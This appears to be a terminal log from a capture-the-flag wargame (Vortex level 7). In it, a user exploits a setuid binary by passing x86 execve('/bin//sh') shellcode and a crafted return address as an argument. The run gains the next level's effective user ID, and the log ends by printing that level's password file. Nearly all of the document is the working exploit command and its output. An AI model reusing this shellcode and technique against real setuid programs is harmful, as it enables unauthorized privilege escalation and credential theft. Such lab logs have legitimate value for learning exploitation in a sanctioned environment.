vortex7@melinda:/tmp/berne7$ env -i ./vortex7 $(echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\xfc\x71\xa5\xd8\x41\x41\x41\x42\x41\x41\x43\x41\x41\x44\x41\x41\x45\x41\x41\x46\x41\x41\x47\x41\x41\x48\x41\x41\x49\x41\x41\x4a\x41\x41\x4b\x41\x41\x4c\x41\x41\x4d\x41\x41\x4e\x41\x41\x4f\x41\x41\x50\xe2\xdd\xff\xff")
$ id
uid=5007(vortex7) gid=5007(vortex7) groups=5007(vortex7)
$ exit
vortex7@melinda:/tmp/berne7$ cd /vortex
vortex7@melinda:/vortex$ env -i ./vortex7 $(echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\xfc\x71\xa5\xd8\x41\x41\x41\x42\x41\x41\x43\x41\x41\x44\x41\x41\x45\x41\x41\x46\x41\x41\x47\x41\x41\x48\x41\x41\x49\x41\x41\x4a\x41\x41\x4b\x41\x41\x4c\x41\x41\x4d\x41\x41\x4e\x41\x41\x4f\x41\x41\x50\xe2\xdd\xff\xff")
$ id
uid=5007(vortex7) gid=5007(vortex7) euid=5008(vortex8) groups=5008(vortex8),5007(vortex7)
$ uname -a
Linux melinda 4.8.6-x86_64-linode78 #1 SMP Tue Nov 1 14:51:21 EDT 2016 x86_64 x86_64 x86_64 GNU/Linux
$ pwd
/games/vortex
$ cd /etc/vortex_pass
$ ls -l vortex8
-r-------- 1 vortex8 vortex8 10 Nov 14  2014 vortex8
$ cat vortex8
X70A_gcgl
$
